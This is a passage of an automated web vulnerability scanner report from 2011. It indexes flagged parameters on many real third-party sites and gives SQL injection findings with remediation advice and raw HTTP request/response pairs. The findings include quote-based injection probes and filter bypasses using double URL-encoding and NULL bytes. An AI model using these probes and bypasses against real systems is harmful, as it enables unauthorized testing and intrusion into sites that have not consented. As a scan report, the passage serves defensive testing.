3.295. http://sm8.sitemeter.com/js/counter.asp [site parameter]

3.296. http://sm8.sitemeter.com/js/counter.js [site parameter]

3.297. http://sm9.sitemeter.com/js/counter.asp [site parameter]

3.298. http://sm9.sitemeter.com/js/counter.js [site parameter]

3.299. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

3.300. http://stream.thenextweb.fyre.co/1872433/version/12952214/00C65D8C/ [REST URL parameter 1]

3.301. http://stream.thenextweb.fyre.co/1872433/version/12952214/00C65D8C/ [REST URL parameter 2]

3.302. http://stream.thenextweb.fyre.co/1872433/version/12952214/00C65D8C/ [REST URL parameter 3]

3.303. http://stream.thenextweb.fyre.co/livecountping/1872433/anonymous/kCNPRQKrwA/rooms.thenextweb.fyre.co/ [REST URL parameter 1]

3.304. http://tag.admeld.com/ad/js/434/admeld_fds_vc_tier2_cpm_octdec10/728x90/admeld_fds_vc_ron4 [hu parameter]

3.305. http://tag.admeld.com/ad/js/434/burstdirecttier1/300x250/admeld_fds_fc_ron6 [hu parameter]

3.306. http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ [name of an arbitrarily supplied request parameter]

3.307. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

3.308. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

3.309. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

3.310. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

3.311. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

3.312. http://web.adblade.com/imps.php [description_color parameter]

3.313. http://web.adblade.com/imps.php [title_color parameter]

3.314. http://web.theplatform.com/crossdomain.xml [REST URL parameter 1]

3.315. http://web.theplatform.com/data/Reseller/mpx.txt [REST URL parameter 1]

3.316. http://web.theplatform.com/data/Reseller/mpx.txt [REST URL parameter 2]

3.317. http://web.theplatform.com/data/Reseller/mpx.txt [REST URL parameter 3]

3.318. http://web.theplatform.com/favicon.ico [REST URL parameter 1]

3.319. https://weblogin.bu.edu//web@login3 [br parameter]

3.320. https://weblogin.bu.edu//web@login3 [fl parameter]

3.321. https://weblogin.bu.edu//web@login3 [jsv parameter]

3.322. https://weblogin.bu.edu//web@login3 [name of an arbitrarily supplied request parameter]

3.323. https://weblogin.bu.edu/accounts/forgot [_authref parameter]

3.324. https://weblogin.bu.edu/accounts/forgot [_hostname parameter]

3.325. https://weblogin.bu.edu/web@login3 [br parameter]

3.326. https://weblogin.bu.edu/web@login3 [fl parameter]

3.327. https://weblogin.bu.edu/web@login3 [jsv parameter]

3.328. https://weblogin.bu.edu/web@login3 [name of an arbitrarily supplied request parameter]

3.329. http://www.bit9.com/resources/register/index.php [file parameter]

3.330. http://www.bit9.com/resources/register/index.php [level parameter]

3.331. https://www.bu.edu/phpbin/telegraph/ [comments parameter]

3.332. https://www.bu.edu/phpbin/telegraph/ [fund_other parameter]

3.333. https://www.fis.dowjones.com/article.aspx [s parameter]

3.334. http://www.hcp.com/2tor [REST URL parameter 1]

3.335. http://www.hcp.com/__utm.gif [REST URL parameter 1]

3.336. http://www.hcp.com/avidyne [REST URL parameter 1]

3.337. http://www.hcp.com/bob_amster [REST URL parameter 1]

3.338. http://www.hcp.com/dan_nova [REST URL parameter 1]

3.339. http://www.hcp.com/favicon.ico [REST URL parameter 1]

3.340. http://www.hcp.com/highland_backed_companies [REST URL parameter 1]

3.341. http://www.hcp.com/highland_extranet [REST URL parameter 1]

3.342. http://www.hcp.com/info_comm_technology [REST URL parameter 1]

3.343. http://www.hcp.com/sectors [REST URL parameter 1]

3.344. http://www.hcp.com/webos/blank.html [REST URL parameter 1]

3.345. http://www.hcp.com/webos/blank.html [REST URL parameter 2]

3.346. http://www.magnify.net/media/site/P8TH6404Q1P6NBW1/local_style.css [REST URL parameter 1]

3.347. http://www.meetup.com/birddog/widget_map.jsp [height parameter]

3.348. http://www.meetup.com/birddog/widget_map.jsp [height parameter]

3.349. http://www.meetup.com/birddog/widget_map.jsp [markers parameter]

3.350. http://www.meetup.com/birddog/widget_map.jsp [width parameter]

3.351. http://www.meetup.com/birddog/widget_map.jsp [width parameter]

3.352. http://www.mongodb.org/dosearchsite.action [queryString parameter]

3.353. http://www.mongodb.org/s/1627/3/4/_/styles/combined.css [spaceKey parameter]

3.354. http://www.mongodb.org/s/1627/3/5/_/styles/combined.css [spaceKey parameter]

3.355. http://www.mongodb.org/s/1627/3/6/_/styles/combined.css [spaceKey parameter]

3.356. http://www.nbcnewyork.com/i/dispatcher/ [zipCode parameter]

3.357. http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html [name of an arbitrarily supplied request parameter]

3.358. http://www.nbcnewyork.com/results/ [keywords parameter]

3.359. http://www.nbcnewyork.com/weather/ [name of an arbitrarily supplied request parameter]

3.360. http://www.nbcnewyork.com/weather/ [name of an arbitrarily supplied request parameter]

3.361. http://www.nbcnewyork.com/weather/ [zipCode parameter]

3.362. http://www.nbcnewyork.com/weather/ [zipCode parameter]

3.363. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

3.364. http://www.skillshare.com/data/0/0/1/12/nyc [REST URL parameter 1]

3.365. http://www.wattpad.com/stories [REST URL parameter 1]

3.366. http://www.wattpad.com/stories/search/xss%20carbon [REST URL parameter 2]

3.367. http://www.wattpad.com/stories/search/xss%20carbon [REST URL parameter 3]

3.368. http://www.wattpad.com/user_signup [mtb_email parameter]

3.369. http://www.wattpad.com/user_signup [mtb_username parameter]

3.370. http://www.wattpad.com/user_signup [referral parameter]

3.371. http://www.wbur.org/arts-calendar/ [url parameter]

3.372. http://www.wbur.org/content/news/arts-culture [name of an arbitrarily supplied request parameter]

3.373. http://www.wbur.org/content/news/boston [name of an arbitrarily supplied request parameter]

3.374. http://www.wbur.org/content/news/economy-business [name of an arbitrarily supplied request parameter]

3.375. http://www.wbur.org/content/news/health [name of an arbitrarily supplied request parameter]

3.376. http://www.wbur.org/content/news/nation [name of an arbitrarily supplied request parameter]

3.377. http://www.wbur.org/content/news/politics [name of an arbitrarily supplied request parameter]

3.378. http://www.wbur.org/content/news/science-technology [name of an arbitrarily supplied request parameter]

3.379. http://www.wbur.org/content/news/sports [name of an arbitrarily supplied request parameter]

3.380. http://www.wbur.org/content/news/world [name of an arbitrarily supplied request parameter]

3.381. http://www.wbur.org/email-this [link parameter]

3.382. http://www.wbur.org/email-this [link parameter]

3.383. http://www.wbur.org/email-this [name of an arbitrarily supplied request parameter]

3.384. http://www.wbur.org/email-this [story parameter]

3.385. http://www.wbur.org/email-this [story parameter]

3.386. http://www.wbur.org/email-this [story parameter]

3.387. http://www.wbur.org/media-player [title parameter]

3.388. http://www.wbur.org/media-player [title parameter]

3.389. http://www.wbur.org/media-player [url parameter]

3.390. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.391. http://clientcentre.dstglobalsolutions.com/ [Referer HTTP header]

3.392. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [Referer HTTP header]

3.393. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [Referer HTTP header]

3.394. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [Referer HTTP header]

3.395. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [Referer HTTP header]

3.396. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [Referer HTTP header]

3.397. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.398. https://store.t-suite.telstra.com/jsdn/web/login/loginview.jsp [User-Agent HTTP header]

3.399. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.400. http://ar.voicefive.com/bmx3/broker.pli [UIDR cookie]

3.401. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

3.402. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

3.403. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

3.404. http://ar.voicefive.com/bmx3/broker.pli [ar_p117672109 cookie]

3.405. http://ar.voicefive.com/bmx3/broker.pli [ar_p119936314 cookie]

3.406. http://ar.voicefive.com/bmx3/broker.pli [ar_p120927104 cookie]

3.407. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

3.408. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.409. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.410. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

3.411. http://people.bu.edu/favicon.ico [REST URL parameter 1]

3.412. http://r.skimresources.com/api/ [skimGUID cookie]

3.413. http://sm9.sitemeter.com/js/counter.asp [IP cookie]

3.414. http://sm9.sitemeter.com/js/counter.js [IP cookie]

3.415. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

3.416. https://weblogin.bu.edu/accounts/forgot [weblogin3 cookie]

3.417. https://weblogin.bu.edu/webnew/alumnew [weblogin3 cookie]

3.418. http://www.bu.edu/htbin/library/ezproxyLogin.pl [weblogin3 cookie]

3.419. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [pers_cookie_insert_nbc_blogs_80 cookie]

3.420. http://www.skillshare.com/data/0/0/1/12/nyc [YII_CSRF_TOKEN cookie]

3.421. http://www.wattpad.com/ [HAPSID cookie]

3.422. http://www.wattpad.com/stories [HAPSID cookie]

3.423. http://www.wattpad.com/stories/search/xss%20carbon [HAPSID cookie]

3.424. http://www.wattpad.com/user_signup [HAPSID cookie]



1. SQL injection
There are 53 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/blog_deals

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6955
Set-Cookie: id=cdf63f63c000025||t=1317849187|et=730|cs=002213fd488b3b0c75b2fab850; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:13:07 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:13:07 GMT
Date: Wed, 05 Oct 2011 21:13:07 GMT
Expires: Wed, 05 Oct 2011 21:13:07 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 17:11:10 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT''

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3794
Set-Cookie: id=c9d66f63c000077||t=1317849188|et=730|cs=002213fd48fcd9706c1e93c832; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:13:08 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:13:08 GMT
Date: Wed, 05 Oct 2011 21:13:08 GMT
Expires: Wed, 05 Oct 2011 21:13:08 GMT
Cache-Control: private

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Thu Sep 22 02:47:00 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/blog_venturecapital

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;&1%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2045
Set-Cookie: id=c6565f63c0000b9||t=1317849164|et=730|cs=002213fd48dac6323075d6a244; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:12:44 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:12:44 GMT
Date: Wed, 05 Oct 2011 21:12:43 GMT
Expires: Wed, 05 Oct 2011 21:12:43 GMT
Cache-Control: private

document.write('<noscript>\n\n<body><div style=\"position:relative; z-index:1\" align=\"center\">\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/e%3B242487794%3B1-0%3B0%3B33081019%
...[SNIP]...
B%3Bmc%3Db2pfreezone%3Btile%3D1%3Bsz%3D300x250%2C336x280%3B%261%2527%3D1%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3fhttp://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=163720&eid=1559297&file=NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/e%3B242487794%3B1-0%3B0%3B33081019%3B4307-300/250%3B44
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;&1%2527%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4112
Set-Cookie: id=c8a64f63c00007e||t=1317849165|et=730|cs=002213fd4848cb84b7b1758412; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:12:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:12:45 GMT
Date: Wed, 05 Oct 2011 21:12:45 GMT
Expires: Wed, 05 Oct 2011 21:12:45 GMT
Cache-Control: private

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Tue Jun 21 03:25:12 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

1.3. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s37146793666761 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s37146793666761

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/djglobal,djwsj/1/H.20.3/s37146793666761?AQB=1&ndh=1&t=5/9/2011%2016%3A12%3A8%203%20300&vmt=44BD02B1&ce=UTF-8&ns=dowjones&pageName=WSJ_Dealjournalblog_home&g=http%3A//blogs.wsj.com/deals/&r=http%3A//blogs.wsj.com/venturecapital/%3Fmod%3Dtech&cc=USD&ch=Online%20Journal&server=http%3A//blogs.wsj.com&events=event12%2Cevent68&c1=Blogs&c2=WSJ_Markets&c3=WSJ_Blogs_Dealjournalblog&v4=WSJ_Dealjournalblog_home&c5=http%3A//blogs.wsj.com/deals/&c6=http%3A//blogs.wsj.com/deals/&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=blog_deals&c19=blogs_summaries&c22=WSJ_Blogs_Dealjournalblog&c23=2011-10-05%2008%3A04&c24=Edition_North_America_USA&v25=WSJ_Markets&c26=WSJ_Deals&c27=WSJ_free&v29=WSJ_Deals&v31=Wednesday&v32=16%3A00&v37=WSJ_Blogs_Dealjournalblog&c49=3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1032&bh=890&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/deals/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D24C051D3C20-4000012D80000C3D[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 05 Oct 2011 21:18:22 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/djglobal,djwsj/1/H.20.3/s37146793666761?AQB=1&ndh=1&t=5/9/2011%2016%3A12%3A8%203%20300&vmt=44BD02B1&ce=UTF-8&ns=dowjones&pageName=WSJ_Dealjournalblog_home&g=http%3A//blogs.wsj.com/deals/&r=http%3A//blogs.wsj.com/venturecapital/%3Fmod%3Dtech&cc=USD&ch=Online%20Journal&server=http%3A//blogs.wsj.com&events=event12%2Cevent68&c1=Blogs&c2=WSJ_Markets&c3=WSJ_Blogs_Dealjournalblog&v4=WSJ_Dealjournalblog_home&c5=http%3A//blogs.wsj.com/deals/&c6=http%3A//blogs.wsj.com/deals/&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=blog_deals&c19=blogs_summaries&c22=WSJ_Blogs_Dealjournalblog&c23=2011-10-05%2008%3A04&c24=Edition_North_America_USA&v25=WSJ_Markets&c26=WSJ_Deals&c27=WSJ_free&v29=WSJ_Deals&v31=Wednesday&v32=16%3A00&v37=WSJ_Blogs_Dealjournalblog&c49=3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1032&bh=890&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/deals/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D24C051D3C20-4000012D80000C3D[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 05 Oct 2011 21:18:22 GMT
Server: Omniture DC/2.0.0
xserver: www371
Content-Length: 0
Content-Type: text/html


1.4. http://theplatform.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865616; expires=Thu, 04-Oct-2012 18:46:56 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

